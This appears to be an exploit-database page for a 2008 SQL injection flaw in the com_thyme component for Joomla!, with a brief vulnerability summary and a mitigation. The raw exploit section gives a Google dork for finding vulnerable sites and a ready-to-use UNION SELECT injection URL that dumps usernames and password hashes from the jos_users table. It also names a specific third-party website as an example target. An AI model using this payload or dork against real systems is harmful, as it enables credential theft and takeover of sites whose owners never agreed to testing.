SQL Injection in com_thyme Component for Joomla!

vendor:

Thyme

by:

Ded MustD!e

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Thyme

Affected Version From: 1.0.x

Affected Version To: 1.0.x

Patch Exists: YES

Related CWE: N/A

CPE: a:extrovert_software:thyme

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Joomla!

2008

SQL Injection in com_thyme Component for Joomla!

A SQL injection vulnerability exists in the com_thyme component for Joomla! 1.0.x. The vulnerability is due to insufficient sanitization of user-supplied input to the 'event' parameter in the 'index.php' script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's database, resulting in the manipulation or disclosure of arbitrary data. This can be exploited to bypass authentication and gain administrative access to the application.

Mitigation:

Upgrade to the latest version of com_thyme component for Joomla! 1.0.x.

Source

Exploit-DB raw data:

###################################################################################################################
#Author: Ded MustD!e
###################################################################################################################
#Google Dork: com_thyme
###################################################################################################################
#Exploit: http://www.site.com/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*
###################################################################################################################
#Example: http://www.orlandoprofessionals.org/index.php?option=com_thyme&calendar=1&category=0&d=25&m=10&y=2008&Itemid=67&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*
###################################################################################################################

<creationDate>10/10/2005</creationDate>
<author>eXtrovert software</author>
<copyright>eXtrovert software</copyright>
<authorEmail>thyme@extrosoft.com</authorEmail>
<authorUrl>www.extrosoft.com</authorUrl>
<version>1.0</version>

# milw0rm.com [2008-11-21]